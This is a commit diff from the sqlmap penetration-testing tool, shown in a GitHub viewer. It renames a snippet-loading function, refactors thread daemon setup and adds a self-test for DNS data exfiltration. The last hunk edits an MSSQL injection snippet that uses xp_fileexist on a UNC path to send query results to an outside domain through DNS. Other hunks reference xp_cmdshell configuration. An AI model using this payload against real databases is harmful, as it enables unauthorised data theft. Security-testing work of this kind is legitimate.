| FazBrowse GitHub Viewer | Trending | | Home |
| Tools: [Download Repo ZIP] [Original HTTPS Page] |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -1599,9 +1599,9 @@ def parseXmlFile(xmlFile, handler): | |||
| 1599 | 1599 | parse(stream, handler) | |
| 1600 | 1600 | stream.close() | |
| 1601 | 1601 | ||
| 1602 | - def getSPLSnippet(dbms, name, **variables): | ||
| 1602 | + def getSPQLSnippet(dbms, name, **variables): | ||
| 1603 | 1603 | """ | |
| 1604 | - Returns content of SPL snippet located inside "procs" directory | ||
| 1604 | + Returns content of SP(Q)L snippet located inside "procs" directory | ||
| 1605 | 1605 | """ | |
| 1606 | 1606 | ||
| 1607 | 1607 | filename = os.path.join(paths.SQLMAP_PROCS_PATH, DBMS_DIRECTORY_DICT[dbms], "%s.txt" % name) | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -1438,6 +1438,7 @@ def __setKnowledgeBaseAttributes(flushAll=True): | |||
| 1438 | 1438 | kb.delayCandidates = TIME_DELAY_CANDIDATES * [0] | |
| 1439 | 1439 | kb.dep = None | |
| 1440 | 1440 | kb.dnsMode = False | |
| 1441 | + kb.dnsTest = None | ||
| 1441 | 1442 | kb.docRoot = None | |
| 1442 | 1443 | kb.dumpMode = False | |
| 1443 | 1444 | kb.dynamicMarkings = [] | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -92,6 +92,13 @@ def exceptionHandledFunction(threadFunction): | |||
| 92 | 92 | print | |
| 93 | 93 | logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) | |
| 94 | 94 | ||
| 95 | + def setDaemon(thread): | ||
| 96 | + # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation | ||
| 97 | + if PYVERSION >= "2.6": | ||
| 98 | + thread.daemon = True | ||
| 99 | + else: | ||
| 100 | + thread.setDaemon(True) | ||
| 101 | + | ||
| 95 | 102 | def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardException=True, threadChoice=False, startThreadMsg=True): | |
| 96 | 103 | threads = [] | |
| 97 | 104 | ||
@@ -128,11 +135,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio | |||
| 128 | 135 | for numThread in xrange(numThreads): | |
| 129 | 136 | thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[threadFunction]) | |
| 130 | 137 | ||
| 131 | - # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation | ||
| 132 | - if PYVERSION >= "2.6": | ||
| 133 | - thread.daemon = True | ||
| 134 | - else: | ||
| 135 | - thread.setDaemon(True) | ||
| 138 | + setDaemon(thread) | ||
| 136 | 139 | ||
| 137 | 140 | try: | |
| 138 | 141 | thread.start() | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -90,6 +90,7 @@ def _(): | |||
| 90 | 90 | self._running = False | |
| 91 | 91 | ||
| 92 | 92 | thread = threading.Thread(target=_) | |
| 93 | + thread.daemon = True | ||
| 93 | 94 | thread.start() | |
| 94 | 95 | ||
| 95 | 96 | if __name__ == "__main__": | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -60,8 +60,7 @@ def __goInference(payload, expression, charsetType=None, firstChar=None, lastCha | |||
| 60 | 60 | value = None | |
| 61 | 61 | count = 0 | |
| 62 | 62 | ||
| 63 | - if conf.dnsDomain: | ||
| 64 | - value = dnsUse(payload, expression) | ||
| 63 | + value = __goDns(payload, expression) | ||
| 65 | 64 | ||
| 66 | 65 | if value is None: | |
| 67 | 66 | timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) | |
@@ -81,6 +80,26 @@ def __goInference(payload, expression, charsetType=None, firstChar=None, lastCha | |||
| 81 | 80 | ||
| 82 | 81 | return value | |
| 83 | 82 | ||
| 83 | + def __goDns(payload, expression): | ||
| 84 | + value = None | ||
| 85 | + | ||
| 86 | + if conf.dnsDomain and kb.dnsTest is not False: | ||
| 87 | + if kb.dnsTest is None: | ||
| 88 | + randInt = randomInt() | ||
| 89 | + kb.dnsTest = dnsUse(payload, "SELECT %d" % randInt) == str(randInt) | ||
| 90 | + if not kb.dnsTest: | ||
| 91 | + errMsg = "test for data retrieval through DNS channel failed. Turning off DNS exfiltration support" | ||
| 92 | + logger.error(errMsg) | ||
| 93 | + conf.dnsDomain = None | ||
| 94 | + else: | ||
| 95 | + infoMsg = "test for data retrieval through DNS channel was successful" | ||
| 96 | + logger.info(infoMsg) | ||
| 97 | + | ||
| 98 | + if kb.dnsTest: | ||
| 99 | + value = dnsUse(payload, expression) | ||
| 100 | + | ||
| 101 | + return value | ||
| 102 | + | ||
| 84 | 103 | def __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected=None, num=None, charsetType=None, firstChar=None, lastChar=None, dump=False): | |
| 85 | 104 | outputs = [] | |
| 86 | 105 | origExpr = None | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -8,7 +8,7 @@ | |||
| 8 | 8 | """ | |
| 9 | 9 | ||
| 10 | 10 | from lib.core.common import Backend | |
| 11 | - from lib.core.common import getSPLSnippet | ||
| 11 | + from lib.core.common import getSPQLSnippet | ||
| 12 | 12 | from lib.core.common import hashDBWrite | |
| 13 | 13 | from lib.core.common import isNoneValue | |
| 14 | 14 | from lib.core.common import pushValue | |
@@ -67,7 +67,7 @@ def __xpCmdshellConfigure2005(self, mode): | |||
| 67 | 67 | debugMsg += "stored procedure" | |
| 68 | 68 | logger.debug(debugMsg) | |
| 69 | 69 | ||
| 70 | - cmd = getSPLSnippet(DBMS.MSSQL, "configure_xp_cmdshell", ENABLE=str(mode)) | ||
| 70 | + cmd = getSPQLSnippet(DBMS.MSSQL, "configure_xp_cmdshell", ENABLE=str(mode)) | ||
| 71 | 71 | ||
| 72 | 72 | return cmd | |
| 73 | 73 | ||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -17,7 +17,7 @@ | |||
| 17 | 17 | from lib.core.common import dataToStdout | |
| 18 | 18 | from lib.core.common import decodeHexValue | |
| 19 | 19 | from lib.core.common import extractRegexResult | |
| 20 | - from lib.core.common import getSPLSnippet | ||
| 20 | + from lib.core.common import getSPQLSnippet | ||
| 21 | 21 | from lib.core.common import hashDBRetrieve | |
| 22 | 22 | from lib.core.common import hashDBWrite | |
| 23 | 23 | from lib.core.common import pushValue | |
@@ -52,7 +52,7 @@ def dnsUse(payload, expression): | |||
| 52 | 52 | ||
| 53 | 53 | if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE): | |
| 54 | 54 | output = hashDBRetrieve(expression, checkConf=True) | |
| 55 | - if output and PARTIAL_VALUE_MARKER in output: | ||
| 55 | + if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None: | ||
| 56 | 56 | output = None | |
| 57 | 57 | ||
| 58 | 58 | if output is None: | |
@@ -68,10 +68,9 @@ def dnsUse(payload, expression): | |||
| 68 | 68 | nulledCastedField = agent.hexConvertField(nulledCastedField) | |
| 69 | 69 | expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) | |
| 70 | 70 | ||
| 71 | - expressionRequest = getSPLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain) | ||
| 71 | + expressionRequest = getSPQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain) | ||
| 72 | 72 | expressionUnescaped = unescaper.unescape(expressionRequest) | |
| 73 | 73 | ||
| 74 | - | ||
| 75 | 74 | if Backend.isDbms(DBMS.MSSQL): | |
| 76 | 75 | comment = queries[Backend.getIdentifiedDbms()].comment.query | |
| 77 | 76 | query = agent.prefixQuery("; %s" % expressionUnescaped) | |
@@ -96,9 +95,10 @@ def dnsUse(payload, expression): | |||
| 96 | 95 | ||
| 97 | 96 | if output is not None: | |
| 98 | 97 | retVal = output | |
| 99 | - dataToStdout("[%s] [INFO] %s: %s\r\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output))) | ||
| 100 | - if count > 0: | ||
| 101 | - hashDBWrite(expression, output) | ||
| 98 | + if kb.dnsTest is not None: | ||
| 99 | + dataToStdout("[%s] [INFO] %s: %s\r\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output))) | ||
| 100 | + if count > 0: | ||
| 101 | + hashDBWrite(expression, output) | ||
| 102 | 102 | ||
| 103 | 103 | if not kb.bruteMode: | |
| 104 | 104 | debugMsg = "performed %d queries in %d seconds" % (count, calculateDeltaSeconds(start)) | |
@@ -108,6 +108,5 @@ def dnsUse(payload, expression): | |||
| 108 | 108 | warnMsg = "DNS data exfiltration method through SQL injection " | |
| 109 | 109 | warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms() | |
| 110 | 110 | singleTimeWarnMessage(warnMsg) | |
| 111 | - conf.dnsDomain = None | ||
| 112 | 111 | ||
| 113 | 112 | return retVal | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -1,4 +1,4 @@ | |||
| 1 | 1 | DECLARE @host varchar(1024); | |
| 2 | 2 | SELECT @host = '%PREFIX%.' + (%QUERY%) + '.%SUFFIX%' + '.%DOMAIN%'; | |
| 3 | - EXEC('xp_fileexist "\\' + @host + '\c$boot.ini"'); | ||
| 3 | + EXEC('xp_fileexist "\\' + @host + '\%PREFIX%%SUFFIX%"'); | ||
| 4 | 4 | # or EXEC('xp_dirtree "\\' + @host + '."'); | |
| Back | FazBrowse Home | New Git URL |
0 commit comments